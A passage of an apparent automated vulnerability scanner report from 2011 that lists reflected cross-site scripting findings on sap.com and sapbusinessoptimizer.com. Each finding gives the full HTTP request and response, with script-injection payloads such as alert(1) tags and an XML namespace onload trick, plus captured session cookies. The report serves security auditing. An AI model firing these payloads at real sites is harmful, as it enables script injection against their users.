SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:14 GMT
Content-Length: 8490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='gwtservices597d9';c31b6b8d8f4';
var DOCUMENTNAME='Bridge';
if(!ACTION) var ACTION;
ACTION='03';


var _s_cf17='Global';


</script>
...[SNIP]...

3.80. http://www.sap.com/news-reader/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /news-reader/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b4a5'%3bd754e510cf4 was submitted in the REST URL parameter 1. This input was echoed as 7b4a5';d754e510cf4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news-reader7b4a5'%3bd754e510cf4/ HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33863
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='news-reader7b4a5';d754e510cf4';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.81. http://www.sap.com/print/sme/search/SAP_nn6.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /print/sme/search/SAP_nn6.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b42bf'%3bab2f3f3c6e6 was submitted in the REST URL parameter 1. This input was echoed as b42bf';ab2f3f3c6e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /printb42bf'%3bab2f3f3c6e6/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33993
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='printb42bf';ab2f3f3c6e6';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.82. http://www.sap.com/print/zzzzzz=yyyyy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /print/zzzzzz=yyyyy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1c1'%3b2fef0b79263 was submitted in the REST URL parameter 1. This input was echoed as 4a1c1';2fef0b79263 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /print4a1c1'%3b2fef0b79263/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='print4a1c1';2fef0b79263';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.83. http://www.sap.com/sme/search/SAP_nn6.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /sme/search/SAP_nn6.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af54'%3b4a60b9cecd6 was submitted in the REST URL parameter 1. This input was echoed as 3af54';4a60b9cecd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sme3af54'%3b4a60b9cecd6/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33937
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:29:41 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:29:41 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:29:40 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='sme3af54';4a60b9cecd6';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.84. http://www.sap.com/text/sme/search/SAP_nn6.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /text/sme/search/SAP_nn6.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2480'%3bb72d33e177b was submitted in the REST URL parameter 1. This input was echoed as a2480';b72d33e177b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /texta2480'%3bb72d33e177b/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33986
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='texta2480';b72d33e177b';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.85. http://www.sap.com/text/zzzzzz=yyyyy [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sap.com
Path:   /text/zzzzzz=yyyyy

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38958'%3bda57bbc2a62 was submitted in the REST URL parameter 1. This input was echoed as 38958';da57bbc2a62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /text38958'%3bda57bbc2a62/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33914
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
<script language="Javascript">
var DOCUMENTGROUP='text38958';da57bbc2a62';
var DOCUMENTNAME='Error';


var _s_cf17='Global';


</script>
...[SNIP]...

3.86. https://www.sap.com/contactsap/contact_warning.epx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sap.com
Path:   /contactsap/contact_warning.epx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b53d3"><script>alert(1)</script>f9f797a16d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contactsap/contact_warning.epx?b53d3"><script>alert(1)</script>f9f797a16d1=1 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3577
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:39 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:39 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:04:43 GMT
Connection: close


<html>
   <head>
       <title>SAP - Contact SAP Warning</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" cont
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/contactsap/contact_warning.epx?b53d3"><script>alert(1)</script>f9f797a16d1=1" />
...[SNIP]...

3.87. https://www.sap.com/profile/warning.epx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54634"><script>alert(1)</script>c3e800f960b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profile/warning.epx?54634"><script>alert(1)</script>c3e800f960b=1 HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5163
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:05:07 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:05:07 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:05:13 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...
<link rel="canonical" href="http://www.sap.com/profile/warning.epx?54634"><script>alert(1)</script>c3e800f960b=1" />
...[SNIP]...

3.88. http://www.sapbusinessoptimizer.com/ [xajax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload c6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c was submitted in the xajax parameter. This input was echoed as c6c53<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9e68deb371861330c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /?xajax=registerUserc6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c&xajaxr=1318692636849 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Origin: http://www.sapbusinessoptimizer.com
Method: POST http://www.sapbusinessoptimizer.com/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692630.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:30:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sat, 15 Oct 2011 15:30:48 GMT
Content-Length: 205
Content-Type: text/xml; charset="utf-8"

<?xml version="1.0" encoding="utf-8" ?><xjx><cmd n="al"><![CDATA[Unknown Function registerUserc6c53<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9e68deb371861330c.]]></cmd><
...[SNIP]...

3.89. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962bb"><script>alert(1)</script>4cbb556654f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css962bb"><script>alert(1)</script>4cbb556654f/fancy-popup-styles.css HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 825
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/css962bb"><script>alert(1)</script>4cbb556654f/fancy-popup-styles.css">
...[SNIP]...

3.90. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93738<script>alert(1)</script>2090b0d7ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css93738<script>alert(1)</script>2090b0d7ed/fancy-popup-styles.css HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 819
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>2090b0d7ed/fancy-popup-styles.css">http://www.sapbusinessoptimizer.com/css93738<script>alert(1)</script>2090b0d7ed/fancy-popup-styles.css</a>
...[SNIP]...

3.91. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74698"><script>alert(1)</script>0d84999f009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/fancy-popup-styles.css74698"><script>alert(1)</script>0d84999f009 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 825
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css74698"><script>alert(1)</script>0d84999f009">
...[SNIP]...

3.92. http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /css/fancy-popup-styles.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bad6<script>alert(1)</script>603e9c4cf8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/fancy-popup-styles.css2bad6<script>alert(1)</script>603e9c4cf8c HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>603e9c4cf8c">http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css2bad6<script>alert(1)</script>603e9c4cf8c</a>
...[SNIP]...

3.93. http://www.sapbusinessoptimizer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.ico

Issue detail

